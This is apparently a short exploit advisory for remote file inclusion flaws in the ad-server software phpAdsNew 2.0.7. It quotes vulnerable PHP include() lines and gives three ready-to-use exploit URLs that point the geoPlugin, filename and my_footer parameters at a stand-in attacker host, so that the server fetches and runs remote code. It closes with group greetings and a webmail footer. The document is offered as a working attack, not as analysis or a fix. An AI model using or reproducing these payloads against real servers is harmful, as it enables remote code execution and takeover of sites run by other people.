|
-----------------------------------------------
phpAdsNew 2.0.7 Remote File Include
-----------------------------------------------
Author: Alk()mand()z
-----------------------------------------------
Vuln Code:
include_once ($phpAds_geoPlugin);
.......................
function phpAds_ReportGetPluginInfo($filename)
{
include ($filename);
return ($plugin_info_function());
..........................
include ($phpAds_config['my_footer']);
-----------------------------------------------
3xplo!t:
phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=http://evil_scripts?
phpAdsNew-2.0.7/admin/report-index?filename=http://evil_scripts?
phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=http://evil_scripts?
-----------------------------------------------
download: http://switch.dl.sourceforge.net/sourceforge/phpadsnew/phpAdsNew-2.0.7.zip
-----------------------------------------------
Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa -LoGiC-BoMb - MiRo-TiGeR
SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team
###################################################
AsB-MaT.NeT & D4eG.OrG
###################################################
--
_______________________________________________
Get your free email from http://www.hackermail.com